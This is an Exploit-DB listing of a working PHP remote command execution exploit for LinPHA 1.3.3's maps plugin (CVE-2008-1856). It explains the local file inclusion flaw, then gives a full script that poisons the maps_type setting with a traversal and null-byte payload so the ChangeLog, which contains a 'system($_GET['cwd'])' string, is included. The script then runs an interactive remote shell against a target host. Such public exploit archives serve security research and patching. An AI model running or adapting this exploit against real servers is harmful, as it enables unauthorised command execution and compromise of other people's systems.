LinPHA 1.3.3 Plugin Maps - Remote Command Execution

EDB-ID:

5392

CVE:

2008-1856

EDB Verified:

Author:

EgiX

Type:

webapps

Exploit:   /  

Platform:

PHP

Date:

2008-04-07

Vulnerable App: 
<?php

/*
	--------------------------------------------------------------
	LinPHA <= 1.3.3 (maps plugin) Remote Command Execution Exploit
	--------------------------------------------------------------
	
	author...: EgiX
	mail.....: n0b0d13s[at]gmail[dot]com
	
	link.....: http://linpha.sourceforge.net
	details..: works with magic_quotes_gpc = off

	[-] LFI found by rgod in /plugins/maps/map.main.class.php

	20.	if(!defined('TOP_DIR')) { define('TOP_DIR','../'); }
	21.	
	22.	$type = read_config('maps_type');
	23.	
	24.	require_once(TOP_DIR."/plugins/maps/$type/$type.class.php"); <== LFI
	25.	require_once(TOP_DIR.'/plugins/maps/geocode.class.php');
	26.	include_once(TOP_DIR.'/plugins/maps/location.class.php');

	an attacker could be include an arbitrary local file through the require_once() at
	line 24 cause is possible to modify 'maps_type' config value by another script:

	[-] look at /plugins/maps/db_handler.php

	112.	if(@	$_POST['job'] == "settings") 
	113.	{
	114.	update_config($_POST['maps_yahoo_id'], 'maps_yahoo_id' );
	115.	update_config($_POST['maps_google_key'], 'maps_google_key');
	116.	update_config($_POST['maps_type'], 'maps_type');			<== 'maps_type' value updating
	117.	update_config($_POST['maps_display_type'], 'maps_display_type');
	118.	update_config($_POST['maps_google_ctrl_size'], 'maps_google_ctrl_size');
	119.	update_config($_POST['maps_default_zoom'], 'maps_default_zoom');
	120.	update_config($_POST['maps_default_zoom_location'], 'maps_default_zoom_location');
	121.	update_config($_POST['maps_yahoo_type_control'], 'maps_yahoo_type_control');
	122.	update_config($_POST['maps_yahoo_pan_control'], 'maps_yahoo_pan_control');
	123.	update_config($_POST['maps_yahoo_slide_control'], 'maps_yahoo_slide_control'); 
	124.	update_config($_POST['maps_marker_auto_popup'], 'maps_marker_auto_popup'); 
	125.	
	126.	header("Location: ".TOP_DIR."/admin.php?page=maps&plugins=1");
	127.	}

	and now we need a file to include...what do you think about ChangeLog?

	[-] ChangeLog file:

	393.	###############################################
	394.	###                                         ###
	395.	###          LinPHA 1.1.0 RELEASE!          ###
	396.	###                                         ###
	397.	###############################################
	398.	
	399.	2006-02-19  bzrudi71 <linpha_AT_tuxpower_DOT_de>
	400.	 * tagged LinPHA linpha_1_1_0 :-)
	401.	
	402.	2006-02-18  flo
	403.	 * fixed linpha vulnerability found on secunia.com
	404.	   + docs/index.php and install/*
	405.	     include($lang) fixed
	406.	   + plugins/log/logger.class.php
	407.	     use htmlspecialchars() before write logger events to database or to text file
	408.	     for example:
	409.	     User <?php echo system($_GET['cwd']); ?>: login failed! <== oops! ;)
	410.	     will be replaced by:
	411.	     User <?php echo system($_GET[&#039;cwd&#039;]); ?>: login failed!

*/

error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);

function http_send($host, $packet)
{
	$sock = fsockopen($host, 80);
	while (!$sock)
	{
		print "\n[-] No response from ".$host.":80 Trying again...";
		$sock = fsockopen($host, 80);
	}
	fputs($sock, $packet);
	while (!feof($sock)) $resp .= fread($sock, 1024);
	fclose($sock);
	return $resp;
}

print "\n+------------------------------------------------------------------------+";
print "\n| LinPHA <= 1.3.3 (maps plugin) Remote Command Execution Exploit by EgiX |";
print "\n| - bug (LFI) found by rgod                                              |";
print "\n+------------------------------------------------------------------------+\n";

if ($argc < 3)
{
	print "\nUsage...:	php $argv[0] host path\n";
	print "\nhost....:	target server (ip/hostname)";
	print "\npath....:	path to Linpha directory\n";
	die();
}

$host	= $argv[1];
$path	= $argv[2];
	
$payload = "job=settings&maps_type=%2E%2E/%2E%2E/ChangeLog%00";
$packet  = "POST {$path}plugins/maps/db_handler.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
http_send($host, $packet);
	
define(STDIN, fopen("php://stdin", "r"));

while(1)
{
	print "\nlinpha-shell# ";
	$cmd = trim(fgets(STDIN));
	if ($cmd != "exit")
	{
		$packet = "GET {$path}maps_view.php?cwd=".urlencode($cmd)." HTTP/1.0\r\n";
		$packet.= "Host: {$host}\r\n";
		$packet.= "Connection: close\r\n\r\n";
		$resp	= http_send($host, $packet);
		if (!ereg("ChangeLog", $resp)) die("\n[-] Exploit failed...probably magic_quotes_gpc = on\n");
		preg_match("/User (.*): login failed!\n /s", $resp, $shell);
		print "\n{$shell[1]}\n";
	}
	else break;
}

?>

# milw0rm.com [2008-04-07]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services